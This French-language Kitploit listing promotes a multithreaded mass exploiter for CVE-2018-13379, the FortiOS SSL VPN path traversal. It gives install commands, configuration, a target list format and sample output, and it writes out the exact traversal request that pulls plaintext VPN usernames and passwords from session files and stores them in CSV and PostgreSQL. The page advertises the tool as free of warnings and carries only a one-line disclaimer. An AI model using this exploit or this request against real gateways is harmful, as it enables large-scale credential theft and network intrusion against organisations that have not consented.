Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — Exploiteur de masse pour CVE-2018-13379 du Fortinet FortiOS SSL VPN. Extrait les identifiants instantanément, sauvegarde dans CSV + PostgreSQL. Multithreadé, sans avertissements inutiles. | Kitploit
Outils/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

Exploiteur de masse pour CVE-2018-13379 du Fortinet FortiOS SSL VPN. Extrait les identifiants instantanément, sauvegarde dans CSV + PostgreSQL. Multithreadé, sans avertissements inutiles.

Voir le dépôt
12il y a 3 moisPas encore vérifié

preview

CVE-2018-13379 — Exploitation massive pour Fortinet FortiOS SSL VPN

Un outil pour l'exploitation massive de la vulnérabilité CVE-2018-13379 (dépassement de chemin) dans Fortinet FortiOS SSL VPN. Permet de lire les fichiers de session et d'extraire les identifiants et mots de passe en clair.

Fonctionnalités

  • Exploitation de CVE-2018-13379 via le point d'accès /remote/fgt_lang
  • Multithreading (20 threads par défaut)
  • Sauvegarde instantanée des identifiants trouvés dans CSV et PostgreSQL
  • Noms de tables dynamiques dans PostgreSQL avec un horodatage (fortios_creds_20250120_143052)
  • Pas d'avertissements - seulement les résultats

Installation

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

Configuration

Tous les paramètres sont modifiables directement dans le script - pas de bidouille avec les lignes d'arguments en ligne de commande :

root@kitploit:~
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL (optionnel - le script fonctionne sans base de données)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

Utilisation

  1. Créez un fichier targets.txt avec les cibles, une par ligne :
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. Exécutez le script :
root@kitploit:~
python3 exploit.py

Résultats

  • Fichier CSV — tous les identifiants trouvés avec horodatages
  • Table PostgreSQL — une nouvelle table est créée à chaque exécution (fortios_creds_YYYYMMDD_HHMMSS)

Exemple de sortie :

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

Fonctionnement

  1. Une requête GET est envoyée à l'adresse https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession
  2. La réponse est vérifiée pour voir si elle contient la chaîne var fgt_lang (un signe de vulnérabilité)
  3. Les paires username et password sont extraites de la réponse binaire
  4. Les données trouvées sont immédiatement sauvegardées dans CSV et PostgreSQL
  5. Le script passe à la cible suivante.

Prérequis

  • Python 3.6+
  • requests
  • psycopg2-binary (optionnel - seul le CSV fonctionne sans lui)
  • urllib3

Avertissement

Cet outil est destiné à des fins éducatives et à des tests autorisés. Vous êtes responsable de vos propres actions.

Remerciements

  • Vulnérabilité originale découverte par Meh Chang
  • Logique d'exploitation basée sur des recherches publiquement disponibles

Licence

Unlicense - faites ce que vous voulez.

Télécharger l’outil